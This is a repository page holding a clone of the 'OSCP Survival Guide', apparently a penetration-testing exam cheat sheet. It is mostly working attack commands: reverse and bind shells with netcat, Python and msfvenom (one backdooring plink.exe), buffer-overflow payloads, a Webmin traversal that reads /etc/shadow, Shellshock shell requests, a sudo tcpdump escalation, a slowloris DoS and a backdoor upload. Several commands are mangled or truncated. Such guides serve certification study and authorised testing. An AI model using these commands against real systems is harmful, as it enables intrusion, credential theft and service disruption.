Need help with OSCP-survival-guide?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

Elinpf
184 Stars 101 Forks 8 Commits 0 Opened issues

Description

Kali Linux Offensive Security Certified Professional Survival Exam Guide

Services available

!
?

Need anything else?

Contributors list

# 157,542
Jupyter...
Shell
C
ethical...
6 commits

This is a clone of frizb/OSCP-Survival-Guide

This can also be viewed on x89k.tk

OSCP-Survival-Guide

NOTE: This document refers to the target ip as the export variable $ip.

To set this value on the command line use the following syntax:

export ip=192.168.1.100

Table of Contents

Kali Linux

  • Set the Target IP Address to the 

    $ip
     system variable
    export ip=192.168.1.100
  • Find the location of a file

    locate sbd.exe
  • Search through directories in the 

    $PATH
     environment variable
    which sbd
  • Find a search for a file that contains a specific string in it’s name:

    find / -name sbd\*
  • Show active internet connections

    netstat -lntp
  • Change Password

    passwd
  • Verify a service is running and listening

    netstat -antp |grep apache
  • Start a service

    systemctl start ssh

    systemctl start apache2
  • Have a service start at boot

    systemctl enable ssh
  • Stop a service

    systemctl stop ssh
  • Unzip a gz file

    gunzip access.log.gz
  • Unzip a tar.gz file

    tar -xzvf file.tar.gz
  • Search command history

    history | grep phrase_to_search_for
  • Download a webpage

    wget http://www.cisco.com
  • Open a webpage

    curl http://www.cisco.com
  • String manipulation

    • Count number of lines in file
      wc -l index.html
    • Get the start or end of a file

      head index.html

      tail index.html
    • Extract all the lines that contain a string

      grep "href=" index.html
    • Cut a string by a delimiter, filter results then sort

      grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u
    • Using Grep and regular expressions and output to a file

      cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt
    • Use a bash loop to find the IP address behind each host

      for url in $(cat list.txt); do host $url; done
    • Collect all the IP Addresses from a log file and sort by frequency

      cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
  • Decoding using Kali

    • Decode Base64 Encoded Values

      echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode
    • Decode Hexidecimal Encoded Values

      echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps
  • Netcat - Read and write TCP and UDP Packets

    • Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):https://joncraton.org/blog/46/netcat-for-windows/
    • Connect to a POP3 mail server
      nc -nv $ip 110
    • Listen on TCP/UDP port
      nc -nlvp 4444
    • Connect to a netcat port
      nc -nv $ip 4444
    • Send a file using netcat
      nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe
    • Receive a file using netcat
      nc -nlvp 4444 > incoming.exe
    • Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...

      whereis nc
      nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
      
      

      /bin/nc.traditional -e /bin/bash 1.2.3.4 4444

    • Create a reverse shell with Ncat using cmd.exe on Windows

      nc.exe -nlvp 4444 -e cmd.exe

      or

      nc.exe -nv   -e cmd.exe
    • Create a reverse shell with Ncat using bash on Linux

      nc -nv $ip 4444 -e /bin/bash
    • Netcat for Banner Grabbing:

      echo "" | nc -nv -w1  
  • Ncat - Netcat for Nmap project which provides more security avoid IDS

    • Reverse shell from windows using cmd.exe using ssl
      ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
    • Listen on port 4444 using ssl
      ncat -v $ip 4444 --ssl
  • Wireshark

    • Show only SMTP (port 25) and ICMP traffic:

      tcp.port eq 25 or icmp
    • Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:

      ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
    • Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:

      ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
    • Some commands are equal

      ip.addr == xxx.xxx.xxx.xxx

      Equals

      ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx

      ip.addr != xxx.xxx.xxx.xxx

      Equals

      ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx
  • Tcpdump

    • Display a pcap file
      tcpdump -r passwordz.pcap
    • Display ips and filter and sort
      tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head
    • Grab a packet capture on port 80
      tcpdump tcp port 80 -w output.pcap -i eth0
    • Check for ACK or PSH flag set in a TCP packet
      tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap
  • Dsniff

    • Display a pcap file with telnet protocol
      dsniff -p ch2.pcap
  • IPTables

    • Deny traffic to ports except for Local Loopback

      iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP

      iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP
    • Clear ALL IPTables firewall rules

      ```bash
      iptables -P INPUT ACCEPT
      iptables -P FORWARD ACCEPT
      iptables -P OUTPUT ACCEPT
      iptables -t nat -F
      iptables -t mangle -F
      iptables -F
      iptables -X
      iptables -t raw -F iptables -t raw -X
      ```
      

Information Gathering & Vulnerability Scanning

  • ## Passive Information Gathering

  • Google Hacking

    • Google search to find website sub domains
      site:microsoft.com
    • Google filetype, and intitle
      intitle:"netbotz appliance" "OK" -filetype:pdf
    • Google inurl
      inurl:"level/15/sexec/-/show"
    • Google Hacking Database:
      https://www.exploit-db.com/google-hacking-database/
  • SSL Certificate Testing
    https://www.ssllabs.com/ssltest/analyze.html

  • Email Harvesting

    • Simply Email

      git clone https://github.com/killswitch-GUI/SimplyEmail.git

      ./SimplyEmail.py -all -e TARGET-DOMAIN
  • LDAP

    • LDAP null bind
      ldapsearch -x -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -H "ldap://challenge01.root-me.org:54013"
  • Netcraft

  • Whois Enumeration

    whois domain-name-here.com

    whois $ip
  • Banner Grabbing

    • nc -v $ip 25
    • telnet $ip 25
    • nc TARGET-IP 80
  • Recon-ng - full-featured web reconnaissance framework written in Python

    • cd /opt; git clone https://[email protected]/LaNMaSteR53/recon-ng.git

      cd /opt/recon-ng

      ./recon-ng

      show modules

      help
  • ## Active Information Gathering

  • ## Port Scanning

Subnet Reference Table

/ Addresses Hosts Netmask Amount of a Class C
/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 510 255.255.254.0 2
/22 1024 1022 255.255.252.0 4
/21 2048 2046 255.255.248.0 8
/20 4096 4094 255.255.240.0 16
/19 8192 8190 255.255.224.0 32
/18 16384 16382 255.255.192.0 64
/17 32768 32766 255.255.128.0 128
/16 65536 65534 255.255.0.0 256
  • Set the ip address as a variable

    export ip=192.168.1.100
     
    nmap -A -T4 -p- $ip
  • Netcat port Scanning

    nc -nvv -w 1 -z $ip 3388-3390
  • Discover active IPs usign ARP on the network: 

    arp-scan $ip/24
  • Discover who else is on the network

    netdiscover
  • Discover IP Mac and Mac vendors from ARP

    netdiscover -r $ip/24
  • Nmap stealth scan using SYN

    nmap -sS $ip
  • Nmap stealth scan using FIN

    nmap -sF $ip
  • Nmap Banner Grabbing

    nmap -sV -sT $ip
  • Nmap OS Fingerprinting

    nmap -O $ip
  • Nmap Regular Scan:

    nmap $ip/24
  • Enumeration Scan

    nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
  • Enumeration Scan All Ports TCP / UDP and output to a txt file

    nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
  • Nmap output to a file:

    nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
  • Quick Scan:

    nmap -T4 -F $ip/24
  • Quick Scan Plus:

    nmap -sV -T4 -O -F --version-light $ip/24
  • Quick traceroute

    nmap -sn --traceroute $ip
  • All TCP and UDP Ports

    nmap -v -sU -sS -p- -A -T4 $ip
  • Intense Scan:

    nmap -T4 -A -v $ip
  • Intense Scan Plus UDP

    nmap -sS -sU -T4 -A -v $ip/24
  • Intense Scan ALL TCP Ports

    nmap -p 1-65535 -T4 -A -v $ip/24
  • Intense Scan - No Ping

    nmap -T4 -A -v -Pn $ip/24
  • Ping scan

    nmap -sn $ip/24
  • Slow Comprehensive Scan

    nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24
  • Scan with Active connect in order to weed out any spoofed ports designed to troll you

    nmap -p1-65535 -A -T5 -sT $ip
  • ## Enumeration

  • DNS Enumeration

    • NMAP DNS Hostnames Lookup 
      nmap -F --dns-server  
    • Host Lookup
      host -t ns megacorpone.com
    • Reverse Lookup Brute Force - find domains in the same range
      for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
    • Perform DNS IP Lookup
      dig a domain-name-here.com @nameserver
    • Perform MX Record Lookup
      dig mx domain-name-here.com @nameserver
    • Perform Zone Transfer with DIG
      dig axfr domain-name-here.com @nameserver
    • DNS Zone Transfers
      Windows DNS zone transfer

      nslookup -> set type=any -> ls -d blah.com

      Linux DNS zone transfer

      dig axfr blah.com @ns1.blah.com
    • Dnsrecon DNS Brute Force

      dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
    • Dnsrecon DNS List of megacorp

      dnsrecon -d megacorpone.com -t axfr
    • DNSEnum

      dnsenum zonetransfer.me
  • NMap Enumeration Script List:

  • NFS (Network File System) Enumeration

    • Show Mountable NFS Shares 
      nmap -sV --script=nfs-showmount $ip
  • RPC (Remote Procedure Call) Enumeration

    • Connect to an RPC share without a username and password and enumerate privledges 
      rpcclient --user="" --command=enumprivs -N $ip
    • Connect to an RPC share with a username and enumerate privledges 
      rpcclient --user="" --command=enumprivs $ip
  • SMB Enumeration

    • SMB OS Discovery
      nmap $ip --script smb-os-discovery.nse
    • Nmap port scan
      nmap -v -p 139,445 -oG smb.txt $ip-254
    • Netbios Information Scanning
      nbtscan -r $ip/24
    • Nmap find exposed Netbios servers
      nmap -sU --script nbstat.nse -p 137 $ip
    • Nmap all SMB scripts scan

      nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
    • Nmap all SMB scripts authenticated scan

      nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
    • SMB Enumeration Tools

      nmblookup -A $ip

      smbclient //MOUNT/share -I $ip -N

      rpcclient -U "" $ip

      enum4linux $ip

      enum4linux -a $ip
    • SMB Finger Printing

      smbclient -L //$ip
    • Nmap Scan for Open SMB Shares

      nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24
    • Nmap scans for vulnerable SMB Servers

      nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
    • Nmap List all SMB scripts installed

      ls -l /usr/share/nmap/scripts/smb*
    • Enumerate SMB Users

      nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14

      OR

      python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
    • RID Cycling - Null Sessions

      ridenum.py $ip 500 50000 dict.txt
    • Manual Null Session Testing

      Windows: 

      net use \\$ip\IPC$ "" /u:""

      Linux: 

      smbclient -L //$ip
  • SMTP Enumeration - Mail Severs

    • Verify SMTP port using Netcat
      nc -nv $ip 25
  • POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet

     [email protected]:~# telnet $ip 110
     +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 
     USER billydean    
     +OK
     PASS password
     +OK Welcome billydean
    
    

    list

    +OK 2 1807 1 786 2 1021

    retr 1

    +OK Message follows From: [email protected] Dear Billy Dean,

    Here is your login for remote desktop ... try not to forget it this time! username: billydean password: PA$$W0RD!Z

  • SNMP Enumeration -Simple Network Management Protocol

    • Fix SNMP output values so they are human readable
      apt-get install snmp-mibs-downloader download-mibs
       
      echo "" > /etc/snmp/snmp.conf
    • SNMP Enumeration Commands

      • snmpcheck -t $ip -c public
      • snmpwalk -c public -v1 $ip 1|
      • grep hrSWRunName|cut -d\* \* -f
      • snmpenum -t $ip
      • onesixtyone -c names -i hosts
    • SNMPv3 Enumeration

      nmap -sV -p 161 --script=snmp-info $ip/24
    • Automate the username enumeration process for SNMPv3:

      apt-get install snmp snmp-mibs-downloader
       
      wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
    • SNMP Default Credentials
      /usr/share/metasploit-framework/data/wordlists/snmpdefaultpass.txt

  • MS SQL Server Enumeration

    • Nmap Information Gathering

      nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
  • Webmin and miniserv/0.01 Enumeration - Port 10000

    Test for LFI & file disclosure vulnerability by grabbing /etc/passwd

    `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
    

    Test to see if webmin is running as root by grabbing /etc/shadow

    `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
    
  • Linux OS Enumeration

    • List all SUID files
      find / -perm -4000 2>/dev/null
    • Determine the current version of Linux
      cat /etc/issue
    • Determine more information about the environment
      uname -a
    • List processes running
      ps -xaf
    • List the allowed (and forbidden) commands for the invoking use
      sudo -l
    • List iptables rules
      iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security
  • Windows OS Enumeration

    • net config Workstation
    • systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
    • hostname
    • net users
    • ipconfig /all
    • route print
    • arp -A
    • netstat -ano
    • netsh firewall show state
    • netsh firewall show config
    • schtasks /query /fo LIST /v
    • tasklist /SVC
    • net start
    • DRIVERQUERY
    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
    • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
    • dir /s pass == cred == vnc == .config
    • findstr /si password *.xml *.ini *.txt
    • reg query HKLM /f password /t REG_SZ /s
    • reg query HKCU /f password /t REG_SZ /s
  • Vulnerability Scanning with Nmap

  • Nmap Exploit Scripts
    https://nmap.org/nsedoc/categories/exploit.html

  • Nmap search through vulnerability scripts

    cd /usr/share/nmap/scripts/ ls -l \*vuln\*
  • Nmap search through Nmap Scripts for a specific keyword

    ls /usr/share/nmap/scripts/\* | grep ftp
  • Scan for vulnerable exploits with nmap

    nmap --script exploit -Pn $ip
  • NMap Auth Scripts
    https://nmap.org/nsedoc/categories/auth.html

  • Nmap Vuln Scanning
    https://nmap.org/nsedoc/categories/vuln.html

  • NMap DOS Scanning

    nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
  • Scan for coldfusion web vulnerabilities

    nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
  • Anonymous FTP dump with Nmap

    nmap -v -p 21 --script=ftp-anon.nse $ip-254
  • SMB Security mode scan with Nmap

    nmap -v -p 21 --script=ftp-anon.nse $ip-254
  • File Enumeration

    • Find UID 0 files root execution
    • /usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null
    • Get handy linux file system enumeration script (/var/tmp)
      wget https://highon.coffee/downloads/linux-local-enum.sh
       
      chmod +x ./linux-local-enum.sh
       
      ./linux-local-enum.sh
    • Find executable files updated in August
      find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug
    • Find a specific file on linux
      find /. -name suid\*
    • Find all the strings in a file
      strings 
    • Determine the type of a file
      file 
  • ## HTTP Enumeration

    • Search for folders with gobuster:
      gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
    • OWasp DirBuster - Http folder enumeration - can take a dictionary file
    • Dirb - Directory brute force finding using a dictionary file

      dirb http://$ip/ wordlist.dict
       
      dirb 

      Dirb against a proxy

    • dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129
    • Nikto

      nikto -h $ip
    • HTTP Enumeration with NMAP

      nmap --script=http-enum -p80 -n $ip/24
    • Nmap Check the server methods

      nmap --script http-methods --script-args http-methods.url-path='/test' $ip
    • Get Options available from web server 

      curl -vX OPTIONS vm/test
    • Uniscan directory finder:

      uniscan -qweds -u 
    • Wfuzz - The web brute forcer

      wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test

      wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ

      wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"

      wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ

      Recurse level 3

      wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
  • Open a service using a port knock (Secured with Knockd)
    for x in 7000 8000 9000; do nmap -Pn --hosttimeout 201 --max-retries 0 -p $x serverip_address; done

  • WordPress Scan - Wordpress security scanner

    • wpscan --url $ip/blog --proxy $ip:3129
  • RSH Enumeration - Unencrypted file transfer system

    • auxiliary/scanner/rservices/rsh_login
  • Finger Enumeration

  • TLS & SSL Testing

    • ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html
  • Proxy Enumeration (useful for open proxies)

    • nikto -useproxy http://$ip:3128 -h $ip
  • Steganography

apt-get install steghide

steghide extract -sf picture.jpg

steghide info picture.jpg

apt-get install stegosuite

  • The OpenVAS Vulnerability Scanner

    • apt-get update
      apt-get install openvas
      openvas-setup
    • netstat -tulpn
    • Login at:
      https://$ip:9392

Buffer Overflows and Exploits

  • DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

  • Nmap Fuzzers:

    • NMap Fuzzer List
      https://nmap.org/nsedoc/categories/fuzzer.html
    • NMap HTTP Form Fuzzer
      nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
    • Nmap DNS Fuzzer
      nmap --script dns-fuzz --script-args timelimit=2h $ip -d
  • MSFvenom
    https://www.offensive-security.com/metasploit-unleashed/msfvenom/

  • Windows Buffer Overflows

    • Controlling EIP

       locate pattern_create
       pattern_create.rb -l 2700
       locate pattern_offset
       pattern_offset.rb -q 39694438
      
    • Verify exact location of EIP - [*] Exact match at offset 2606

      buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
      
    • Check for “Bad Characters” - Run multiple times 0x00 - 0xFF

    • Use Mona to determine a module that is unprotected

    • Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP

    • Use NASM to determine the HEX code for a JMP ESP instruction

      /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
      
      

      JMP ESP
      00000000 FFE4 jmp esp

    • Run Mona in immunity log window to find (FFE4) XEF command

      !mona find -s "\xff\xe4" -m slmfc.dll  
      found at 0x5f4a358f - Flip around for little endian format
      buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
      
    • MSFVenom to create payload

      msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
      
    • Final Payload with NOP slide

      buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
      
    • Create a PE Reverse Shell
      msfvenom -p windows/shellreversetcp LHOST=$ip LPORT=4444 -f
      exe -o shell_reverse.exe

    • Create a PE Reverse Shell and Encode 9 times with Shikataganai
      msfvenom -p windows/shellreversetcp LHOST=$ip LPORT=4444 -f
      exe -e x86/shikataganai -i 9 -o shellreversemsf_encoded.exe

    • Create a PE reverse shell and embed it into an existing executable
      msfvenom -p windows/shellreversetcp LHOST=$ip LPORT=4444 -f exe -e x86/shikataganai -i 9 -x /usr/share/windows-binaries/plink.exe -o shellreversemsfencodedembedded.exe

    • Create a PE Reverse HTTPS shell
      msfvenom -p windows/meterpreter/reversehttps LHOST=$ip LPORT=443 -f exe -o methttps_reverse.exe

  • Linux Buffer Overflows

    • Run Evans Debugger against an app
      edb --run /usr/games/crossfire/bin/crossfire
    • ESP register points toward the end of our CBuffer
      add eax,12
      jmp eax
      83C00C add eax,byte +0xc
      FFE0 jmp eax
    • Check for “Bad Characters” Process of elimination - Run multiple times 0x00 - 0xFF
    • Find JMP ESP address
      "\x97\x45\x13\x08" # Found at Address 08134597
    • crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
    • msfvenom -p linux/x86/shellbindtcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" –e x86/shikataganai
    • Connect to the shell with netcat:
      nc -v $ip 4444

Shells

  • Netcat Shell Listener

    nc -nlvp 4444
  • Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user.

    (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
    
    

    (hint: sudo -l to see what you can run)

    • You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:

        ssh [email protected]$ip nc $localip 4444 -e /bin/sh
        enter user's password
        python -c 'import pty; pty.spawn("/bin/sh")'
        export TERM=linux
      

    python -c 'import pty; pty.spawn("/bin/sh")'
           python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);          s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
    

    echo os.system('/bin/bash')

    /bin/sh -i

    perl —e 'exec "/bin/sh";'

    perl: 

    exec "/bin/sh";

    ruby: 

    exec "/bin/sh"

    lua: 

    os.execute('/bin/sh')

    From within IRB: 

    exec "/bin/sh"

    From within vi: 

    :!bash
     or

    :set shell=/bin/bash:shell

    From within vim 

    ':!bash':

    From within nmap: 

    !sh

    From within tcpdump

     echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
    

    From busybox 

    /bin/busybox telnetd -|/bin/sh -p9999
  • Pen test monkey PHP reverse shell
    http://pentestmonkey.net/tools/web-shells/php-reverse-shel

  • php-findsock-shell - turns PHP port 80 into an interactive shell
    http://pentestmonkey.net/tools/web-shells/php-findsock-shell

  • Perl Reverse Shell
    http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

  • PHP powered web browser Shell b374k with file upload etc.
    https://github.com/b374k/b374k

  • Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shellhttps://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1

  • Web Backdoors from Fuzzdb https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors

  • Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/

    Linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

    Windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

    Mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

    Web Payloads

    PHP

    msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php

    OR

    msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

    Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:

    cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

    ASP

    msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

    JSP

    msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

    WAR

    msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

    Scripting Payloads

    Python

    msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

    Bash

    msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

    Perl

    msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

    Shellcode

    For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

    Linux Based Shellcode

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 

    Windows Based Shellcode

    msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 

    Mac Based Shellcode

    msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 

    Handlers Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

     use exploit/multi/handler
     set PAYLOAD 
     set LHOST 
     set LPORT 
     set ExitOnSession false
     exploit -j -z
    

    Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘

  • SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/

     use auxiliary/scanner/ssh/ssh_login
     use post/multi/manage/shell_to_meterpreter
    
  • SBD.exe

    sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative.

  • Shellshock

    • Testing for shell shock with NMap

    [email protected]:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip
    * git clone https://github.com/nccgroup/shocker

    ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
    * Shell Shock SSH Forced Command
    Check for forced command by enabling all debug output with ssh
          ssh -vvv  
          ssh -i noob [email protected]$ip '() { :;}; /bin/bash'
    
    • cat file (view file contents)

        echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(
    • Shell Shock run bind shell

       echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
      

File Transfers

  • Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.

  • Simple Local Web Servers

    • Run a basic http server, great for serving up shells etc
      python -m SimpleHTTPServer 80
    • Run a basic Python3 http server, great for serving up shells etc
      python3 -m http.server
    • Run a ruby webrick basic http server
      ruby -rwebrick -e "WEBrick::HTTPServer.new
      (:Port => 80, :DocumentRoot => Dir.pwd).start"
    • Run a basic PHP http server
      php -S $ip:80
  • Creating a wget VB Script on Windows:
    https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

  • Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

     echo Set args = Wscript.Arguments  >> webdl.vbs
     timeout 1
     echo Url = "http://1.1.1.1/windows-privesc-check2.exe"  >> webdl.vbs
     timeout 1
     echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")  >> webdl.vbs
     timeout 1
     echo dim bStrm: Set bStrm = createobject("Adodb.Stream")  >> webdl.vbs
     timeout 1
     echo xHttp.Open "GET", Url, False  >> webdl.vbs
     timeout 1
     echo xHttp.Send  >> webdl.vbs
     timeout 1
     echo with bStrm      >> webdl.vbs
     timeout 1
     echo   .type = 1 '      >> webdl.vbs
     timeout 1
     echo   .open      >> webdl.vbs
     timeout 1
     echo   .write xHttp.responseBody      >> webdl.vbs
     timeout 1
     echo   .savetofile "C:\temp\windows-privesc-check2.exe", 2 '  >> webdl.vbs
     timeout 1
     echo end with >> webdl.vbs
     timeout 1
     echo
    

    The file can be run using the following syntax:

    C:\temp\cscript.exe webdl.vbs
  • Mounting File Shares

    • Mount NFS share to /mnt/nfs
      mount $ip:/vol/share /mnt/nfs
  • HTTP Put
    nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php

  • ## Uploading Files

    • SCP

      scp [email protected]host:directory1/filename1 [email protected]host:directory2/filename2

      scp localfile [email protected]$ip:~/Folder/

      scp LinuxExploitSuggester.pl [email protected]:~

    • Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor

      davtest -move -sendbd auto -url http://$ip

